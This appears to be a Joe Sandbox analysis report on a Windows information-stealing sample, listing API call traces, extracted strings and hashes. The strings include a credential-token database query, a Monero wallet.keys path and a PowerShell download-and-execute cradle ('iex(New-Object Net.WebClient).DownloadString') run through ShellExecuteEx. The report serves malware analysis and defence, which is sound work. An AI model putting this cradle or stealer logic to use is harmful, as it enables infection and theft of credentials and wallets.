                                    • Part of subcall function 00248E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00248E52
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0023BCCD
                                  • lstrlen.KERNEL32(00000000), ref: 0023BDA5
                                  • lstrlen.KERNEL32(00000000), ref: 0023BDB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: e2e0eedee8cdfa8e6c9f52bfae8dd5522654f7e4f365504a883942a60393bc09
                                  • Instruction ID: b6076472554323dc385532284f6112eadf9ddffc8881a398a4b24d075287d595
                                  • Opcode Fuzzy Hash: e2e0eedee8cdfa8e6c9f52bfae8dd5522654f7e4f365504a883942a60393bc09
                                  • Instruction Fuzzy Hash: 01B14271970108ABEB18FBA0DD96EEE7338EF54304F404568F507A6091EF346A69CF66
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: 5cdb2ee6aa5e6eff92b20b6faf671a37027f89a8fab78bf42b59ec367d18ddeb
                                  • Instruction ID: 0925d045a30b8219ceeb90bd586ac071d0b4c5f4552d448dc725e233ebdbb404
                                  • Opcode Fuzzy Hash: 5cdb2ee6aa5e6eff92b20b6faf671a37027f89a8fab78bf42b59ec367d18ddeb
                                  • Instruction Fuzzy Hash: BEF0FE31944219EFD748AFE0E90DB6CBB70FB45707F1401A9E60D862D0D6748BA29B9B
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00234FCA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00234FD1
                                  • InternetOpenA.WININET(00250DDF,00000000,00000000,00000000,00000000), ref: 00234FEA
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00235011
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00235041
                                  • InternetCloseHandle.WININET(?), ref: 002350B9
                                  • InternetCloseHandle.WININET(?), ref: 002350C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: 8ee3fad5e64781aea08a9cda999ed3ac672ab1b72fb187cbe4fd278eafbc9880
                                  • Instruction ID: 4f622288f90b90b0bf3133e1f46d4c556f031acfa01b9f267e75de08400db489
                                  • Opcode Fuzzy Hash: 8ee3fad5e64781aea08a9cda999ed3ac672ab1b72fb187cbe4fd278eafbc9880
                                  • Instruction Fuzzy Hash: 523119F4A50218ABDB24CF54DC85BDCB7B4EB48704F1081E8FA09A7280C7706ED58F99
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0104F5F0,00000000,?,00250E2C,00000000,?,00000000), ref: 00248130
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00248137
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00248158
                                  • wsprintfA.USER32 ref: 002481AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2922868504-3474575989
                                  • Opcode ID: e7532b49e7b7dd7a12df311563974fa0b719db734c313a51d4db98707961dab8
                                  • Instruction ID: 2ce8da49b59f9ba2272e94a798acbb75735628effd5d0fe77a8b30b7b4f7bf55
                                  • Opcode Fuzzy Hash: e7532b49e7b7dd7a12df311563974fa0b719db734c313a51d4db98707961dab8
                                  • Instruction Fuzzy Hash: 44215EB1E54218ABDB04DFD4CC49FAFB7B8FB44B04F104519F609BB280D77869118BA9
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00248426
                                  • wsprintfA.USER32 ref: 00248459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0024847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0024848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00248499
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                  • RegQueryValueExA.ADVAPI32(00000000,0104F638,00000000,000F003F,?,00000400), ref: 002484EC
                                  • lstrlen.KERNEL32(?), ref: 00248501
                                  • RegQueryValueExA.ADVAPI32(00000000,0104F758,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00250B34), ref: 00248599
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00248608
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0024861A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: 112295ddc6d018006f5d0ea104340bdacd309e6357178554ce2b7e3531785b2a
                                  • Instruction ID: d4320c4bc55b4e91d4bcad60c0ae03bbbfb2cdaaa5157f77a942f87008f44467
                                  • Opcode Fuzzy Hash: 112295ddc6d018006f5d0ea104340bdacd309e6357178554ce2b7e3531785b2a
                                  • Instruction Fuzzy Hash: CD210A71920218ABDB68DF54DC85FE9B3B8FB48704F00C1A8E609A6180DF71AA95CFD5
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002476A4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002476AB
                                  • RegOpenKeyExA.ADVAPI32(80000002,0103BC30,00000000,00020119,00000000), ref: 002476DD
                                  • RegQueryValueExA.ADVAPI32(00000000,0104F668,00000000,00000000,?,000000FF), ref: 002476FE
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00247708
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 55267b903e949bdf3ea21491bb8c5f91a9c3a8fc126a41fa58f04df92ab53d83
                                  • Instruction ID: da31dffd7e02f93d8108908b79e5f8f4a8e2408e7fc85945cb3ff71eb0c85c25
                                  • Opcode Fuzzy Hash: 55267b903e949bdf3ea21491bb8c5f91a9c3a8fc126a41fa58f04df92ab53d83
                                  • Instruction Fuzzy Hash: C4018FB4A00204BBD704EBE0DC49F6DB7B8EB88701F004064FA08A7291D77099648B56
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00247734
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0024773B
                                  • RegOpenKeyExA.ADVAPI32(80000002,0103BC30,00000000,00020119,002476B9), ref: 0024775B
                                  • RegQueryValueExA.ADVAPI32(002476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0024777A
                                  • RegCloseKey.ADVAPI32(002476B9), ref: 00247784
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: e971d863640135467dbcee84200931cf6f94b66b6553d9a5ef8416610a08b2e5
                                  • Instruction ID: fd387e83c62e46d21767be5625a24b89c3109e3bbfabc7b4d8c013d0bf287056
                                  • Opcode Fuzzy Hash: e971d863640135467dbcee84200931cf6f94b66b6553d9a5ef8416610a08b2e5
                                  • Instruction Fuzzy Hash: 750167F5A50308BBD704EFE0DC49FAEB7B8EB44705F004554FA09A7281D77095548F56
                                  APIs
                                  • CreateFileA.KERNEL32(:$,80000000,00000003,00000000,00000003,00000080,00000000,?,00243AEE,?), ref: 002492FC
                                  • GetFileSizeEx.KERNEL32(000000FF,:$), ref: 00249319
                                  • CloseHandle.KERNEL32(000000FF), ref: 00249327
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID: :$$:$
                                  • API String ID: 1378416451-2447859136
                                  • Opcode ID: 12a00023bcaa47e23a14e096ebd8a1750290c826a97ca1b1d66bede92c16ee43
                                  • Instruction ID: 391510f438b7f8ce165478414c1e883f645efdd2da51d8487fc5c6ca4f5c76a9
                                  • Opcode Fuzzy Hash: 12a00023bcaa47e23a14e096ebd8a1750290c826a97ca1b1d66bede92c16ee43
                                  • Instruction Fuzzy Hash: 64F0AF34E10208BBDB18DFB0DC09F9E7BB9AB88310F10C2A4B655A72C0D6B09A908F44
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002399EC
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00239A11
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00239A31
                                  • ReadFile.KERNEL32(000000FF,?,00000000,0023148F,00000000), ref: 00239A5A
                                  • LocalFree.KERNEL32(0023148F), ref: 00239A90
                                  • CloseHandle.KERNEL32(000000FF), ref: 00239A9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 981e6fbd2c9f05bd4abd36bb95355f5fc389ef9c8496dac83ce1967ee5a2782a
                                  • Instruction ID: 369554be2dd5586e90be156f8d08f6d0e3fe046b169ddde1980017be924e7795
                                  • Opcode Fuzzy Hash: 981e6fbd2c9f05bd4abd36bb95355f5fc389ef9c8496dac83ce1967ee5a2782a
                                  • Instruction Fuzzy Hash: 2D316DB4A1020AEFDB14DF94C985BAE77B5FF49300F108258E905A7290C774A9A1CFA1
                                  APIs
                                  • lstrcat.KERNEL32(?,0104F128), ref: 002447DB
                                    • Part of subcall function 00248DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00248E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00244801
                                  • lstrcat.KERNEL32(?,?), ref: 00244820
                                  • lstrcat.KERNEL32(?,?), ref: 00244834
                                  • lstrcat.KERNEL32(?,0103A478), ref: 00244847
                                  • lstrcat.KERNEL32(?,?), ref: 0024485B
                                  • lstrcat.KERNEL32(?,0104E608), ref: 0024486F
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 00248D90: GetFileAttributesA.KERNEL32(00000000,?,00231B54,?,?,0025564C,?,?,00250E1F), ref: 00248D9F
                                    • Part of subcall function 00244570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00244580
                                    • Part of subcall function 00244570: RtlAllocateHeap.NTDLL(00000000), ref: 00244587
                                    • Part of subcall function 00244570: wsprintfA.USER32 ref: 002445A6
                                    • Part of subcall function 00244570: FindFirstFileA.KERNEL32(?,?), ref: 002445BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: b4073e9037be3aef9f78353e7d3d0494f6cd958b709506e6b0ac0eafd4ba5ceb
                                  • Instruction ID: 4e377dc207627984a9d293925818b5c749f3f3f5fc7d3708c798ea9207986207
                                  • Opcode Fuzzy Hash: b4073e9037be3aef9f78353e7d3d0494f6cd958b709506e6b0ac0eafd4ba5ceb
                                  • Instruction Fuzzy Hash: 383195B2920218A7CB14FBB0DC85EED737CBB98700F404599B31996181EE7497D9CF96
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00242D85
                                  Strings
                                  • <, xrefs: 00242D39
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00242D04
                                  • ')", xrefs: 00242CB3
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00242CC4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                   • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
